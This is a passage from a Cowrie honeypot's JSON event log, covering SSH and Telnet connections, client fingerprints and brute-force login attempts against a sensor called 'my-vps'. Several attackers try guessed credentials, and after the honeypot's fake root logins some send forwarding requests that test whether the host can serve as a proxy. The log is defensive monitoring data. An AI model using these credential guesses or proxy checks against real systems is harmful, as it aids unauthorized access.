,"ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T08:00:40.239450Z","src_ip":"212.227.235.229","session":"f87af6f54957"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:00:41.475431Z","src_ip":"212.227.235.229","session":"f87af6f54957"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:00:41.775228Z","src_ip":"212.227.235.229","session":"f87af6f54957"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:00:41.776085Z","src_ip":"212.227.235.229","session":"87254e31b16c"}
{"eventid":"cowrie.session.connect","src_ip":"206.72.69.55","src_port":60180,"dst_ip":"1.2.3.4","dst_port":23,"session":"54bf76130767","protocol":"telnet","message":"New connection: 206.72.69.55:60180 (1.2.3.4:23) [session: 54bf76130767]","sensor":"my-vps","timestamp":"2025-08-31T08:00:48.081351Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33983,"dst_ip":"1.2.3.4","dst_port":23,"session":"b294a8116945","protocol":"telnet","message":"New connection: 212.227.235.229:33983 (1.2.3.4:23) [session: b294a8116945]","sensor":"my-vps","timestamp":"2025-08-31T08:01:22.446579Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32798,"dst_ip":"1.2.3.4","dst_port":22,"session":"8be57e99f75b","protocol":"ssh","message":"New connection: 212.227.235.229:32798 (1.2.3.4:22) [session: 8be57e99f75b]","sensor":"my-vps","timestamp":"2025-08-31T08:01:23.962017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T08:01:23.963351Z","src_ip":"212.227.235.229","session":"8be57e99f75b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T08:01:24.239277Z","src_ip":"212.227.235.229","session":"8be57e99f75b"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle#2023","message":"login attempt [oracle/oracle#2023] failed","sensor":"my-vps","timestamp":"2025-08-31T08:01:25.327389Z","src_ip":"212.227.235.229","session":"8be57e99f75b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:01:26.602559Z","src_ip":"212.227.235.229","session":"8be57e99f75b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39576,"dst_ip":"1.2.3.4","dst_port":23,"session":"4fd3239fd666","protocol":"telnet","message":"New connection: 212.227.235.229:39576 (1.2.3.4:23) [session: 4fd3239fd666]","sensor":"my-vps","timestamp":"2025-08-31T08:01:27.664130Z"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":52195,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6dd3985e36d","protocol":"ssh","message":"New connection: 80.94.95.112:52195 (1.2.3.4:22) [session: d6dd3985e36d]","sensor":"my-vps","timestamp":"2025-08-31T08:01:31.928076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T08:01:32.273606Z","src_ip":"80.94.95.112","session":"d6dd3985e36d"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T08:01:32.302740Z","src_ip":"80.94.95.112","session":"d6dd3985e36d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"twins2","message":"login attempt [admin/twins2] failed","sensor":"my-vps","timestamp":"2025-08-31T08:01:32.502393Z","src_ip":"80.94.95.112","session":"d6dd3985e36d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"triplets","message":"login attempt [admin/triplets] failed","sensor":"my-vps","timestamp":"2025-08-31T08:01:33.534729Z","src_ip":"80.94.95.112","session":"d6dd3985e36d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"timothy1","message":"login attempt [admin/timothy1] failed","sensor":"my-vps","timestamp":"2025-08-31T08:01:34.567380Z","src_ip":"80.94.95.112","session":"d6dd3985e36d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"timelord","message":"login attempt [admin/timelord] failed","sensor":"my-vps","timestamp":"2025-08-31T08:01:35.631231Z","src_ip":"80.94.95.112","session":"d6dd3985e36d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"thriller","message":"login attempt [admin/thriller] failed","sensor":"my-vps","timestamp":"2025-08-31T08:01:36.662838Z","src_ip":"80.94.95.112","session":"d6dd3985e36d"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:01:37.695278Z","src_ip":"80.94.95.112","session":"d6dd3985e36d"}
{"eventid":"cowrie.session.closed","duration":13.828734874725342,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:01:41.492797Z","src_ip":"212.227.235.229","session":"4fd3239fd666"}
{"eventid":"cowrie.session.closed","duration":31.306867122650146,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:01:53.753379Z","src_ip":"212.227.235.229","session":"b294a8116945"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45649,"dst_ip":"1.2.3.4","dst_port":23,"session":"69372b98c78f","protocol":"telnet","message":"New connection: 212.227.235.229:45649 (1.2.3.4:23) [session: 69372b98c78f]","sensor":"my-vps","timestamp":"2025-08-31T08:02:04.130371Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51770,"dst_ip":"1.2.3.4","dst_port":23,"session":"74a58e5c4734","protocol":"telnet","message":"New connection: 212.227.235.229:51770 (1.2.3.4:23) [session: 74a58e5c4734]","sensor":"my-vps","timestamp":"2025-08-31T08:02:15.619949Z"}
{"eventid":"cowrie.session.closed","duration":13.423141479492188,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:02:17.553439Z","src_ip":"212.227.235.229","session":"69372b98c78f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63433,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c641bfa15cb","protocol":"ssh","message":"New connection: 212.227.235.229:63433 (1.2.3.4:22) [session: 6c641bfa15cb]","sensor":"my-vps","timestamp":"2025-08-31T08:02:27.595986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T08:02:27.597240Z","src_ip":"212.227.235.229","session":"6c641bfa15cb"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T08:02:27.729114Z","src_ip":"212.227.235.229","session":"6c641bfa15cb"}
{"eventid":"cowrie.login.failed","username":"jaylin","password":"jaylin","message":"login attempt [jaylin/jaylin] failed","sensor":"my-vps","timestamp":"2025-08-31T08:02:28.337703Z","src_ip":"212.227.235.229","session":"6c641bfa15cb"}
{"eventid":"cowrie.login.failed","username":"jaylin","password":"jaylin1","message":"login attempt [jaylin/jaylin1] failed","sensor":"my-vps","timestamp":"2025-08-31T08:02:29.473725Z","src_ip":"212.227.235.229","session":"6c641bfa15cb"}
{"eventid":"cowrie.login.failed","username":"jaylin","password":"jaylin123","message":"login attempt [jaylin/jaylin123] failed","sensor":"my-vps","timestamp":"2025-08-31T08:02:30.608115Z","src_ip":"212.227.235.229","session":"6c641bfa15cb"}
{"eventid":"cowrie.login.failed","username":"jaylin","password":"jaylin1234","message":"login attempt [jaylin/jaylin1234] failed","sensor":"my-vps","timestamp":"2025-08-31T08:02:31.741626Z","src_ip":"212.227.235.229","session":"6c641bfa15cb"}
{"eventid":"cowrie.login.failed","username":"jaylin","password":"jaylin12345","message":"login attempt [jaylin/jaylin12345] failed","sensor":"my-vps","timestamp":"2025-08-31T08:02:32.885598Z","src_ip":"212.227.235.229","session":"6c641bfa15cb"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:02:34.019483Z","src_ip":"212.227.235.229","session":"6c641bfa15cb"}
{"eventid":"cowrie.session.closed","duration":30.55224084854126,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:02:46.172119Z","src_ip":"212.227.235.229","session":"74a58e5c4734"}
{"eventid":"cowrie.session.closed","duration":120.00298881530762,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:02:48.084235Z","src_ip":"206.72.69.55","session":"54bf76130767"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47211,"dst_ip":"1.2.3.4","dst_port":22,"session":"1404eb44e775","protocol":"ssh","message":"New connection: 212.227.125.160:47211 (1.2.3.4:22) [session: 1404eb44e775]","sensor":"my-vps","timestamp":"2025-08-31T08:02:57.773091Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:02:57.774214Z","src_ip":"212.227.125.160","session":"1404eb44e775"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47489,"dst_ip":"1.2.3.4","dst_port":22,"session":"922ff59b2dec","protocol":"ssh","message":"New connection: 212.227.125.160:47489 (1.2.3.4:22) [session: 922ff59b2dec]","sensor":"my-vps","timestamp":"2025-08-31T08:02:57.888718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:02:57.889902Z","src_ip":"212.227.125.160","session":"922ff59b2dec"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T08:02:58.006279Z","src_ip":"212.227.125.160","session":"922ff59b2dec"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:02:58.356375Z","src_ip":"212.227.125.160","session":"922ff59b2dec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T08:02:58.473508Z","session":"922ff59b2dec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56239,"dst_ip":"1.2.3.4","dst_port":23,"session":"b01f03470520","protocol":"telnet","message":"New connection: 212.227.125.160:56239 (1.2.3.4:23) [session: b01f03470520]","sensor":"my-vps","timestamp":"2025-08-31T08:03:26.049490Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48372,"dst_ip":"1.2.3.4","dst_port":22,"session":"47fb7318d675","protocol":"ssh","message":"New connection: 212.227.235.229:48372 (1.2.3.4:22) [session: 47fb7318d675]","sensor":"my-vps","timestamp":"2025-08-31T08:03:50.276754Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:03:50.277894Z","src_ip":"212.227.235.229","session":"47fb7318d675"}
{"eventid":"cowrie.session.closed","duration":30.384803533554077,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:03:56.434166Z","src_ip":"212.227.125.160","session":"b01f03470520"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:04:07.887105Z","src_ip":"212.227.125.160","session":"922ff59b2dec"}
{"eventid":"cowrie.session.connect","src_ip":"186.96.145.241","src_port":45274,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2b7254b0abf","protocol":"ssh","message":"New connection: 186.96.145.241:45274 (1.2.3.4:22) [session: c2b7254b0abf]","sensor":"my-vps","timestamp":"2025-08-31T08:04:08.724594Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:04:08.875791Z","src_ip":"186.96.145.241","session":"c2b7254b0abf"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61954,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fef1a03fc1b","protocol":"ssh","message":"New connection: 217.72.205.35:61954 (1.2.3.4:22) [session: 9fef1a03fc1b]","sensor":"my-vps","timestamp":"2025-08-31T08:04:29.481067Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:04:29.482249Z","src_ip":"217.72.205.35","session":"9fef1a03fc1b"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":55228,"dst_ip":"1.2.3.4","dst_port":23,"session":"fd9301942aed","protocol":"telnet","message":"New connection: 79.124.8.120:55228 (1.2.3.4:23) [session: fd9301942aed]","sensor":"my-vps","timestamp":"2025-08-31T08:05:02.012858Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:05:02.053336Z","src_ip":"79.124.8.120","session":"fd9301942aed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:05:02.080230Z","src_ip":"79.124.8.120","session":"fd9301942aed"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39385,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8074fb7f9aa","protocol":"ssh","message":"New connection: 77.83.207.83:39385 (1.2.3.4:22) [session: b8074fb7f9aa]","sensor":"my-vps","timestamp":"2025-08-31T08:05:31.556583Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T08:05:31.567193Z","src_ip":"77.83.207.83","session":"b8074fb7f9aa"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T08:05:31.606925Z","src_ip":"77.83.207.83","session":"b8074fb7f9aa"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:05:31.855748Z","src_ip":"77.83.207.83","session":"b8074fb7f9aa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":29259,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:29259","sensor":"my-vps","timestamp":"2025-08-31T08:05:31.907105Z","session":"b8074fb7f9aa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T08:05:31.957214Z","src_ip":"77.83.207.83","session":"b8074fb7f9aa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":19608,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:19608","sensor":"my-vps","timestamp":"2025-08-31T08:05:32.100157Z","session":"b8074fb7f9aa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T08:05:32.150017Z","src_ip":"77.83.207.83","session":"b8074fb7f9aa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":31955,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:31955","sensor":"my-vps","timestamp":"2025-08-31T08:05:32.292123Z","session":"b8074fb7f9aa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T08:05:32.342096Z","src_ip":"77.83.207.83","session":"b8074fb7f9aa"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:05:32.392793Z","src_ip":"77.83.207.83","session":"b8074fb7f9aa"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:05:50.296910Z","src_ip":"212.227.235.229","session":"47fb7318d675"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37084,"dst_ip":"1.2.3.4","dst_port":22,"session":"21ec50eb2f65","protocol":"ssh","message":"New connection: 212.227.125.160:37084 (1.2.3.4:22) [session: 21ec50eb2f65]","sensor":"my-vps","timestamp":"2025-08-31T08:05:52.155224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:05:52.865947Z","src_ip":"212.227.125.160","session":"21ec50eb2f65"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-5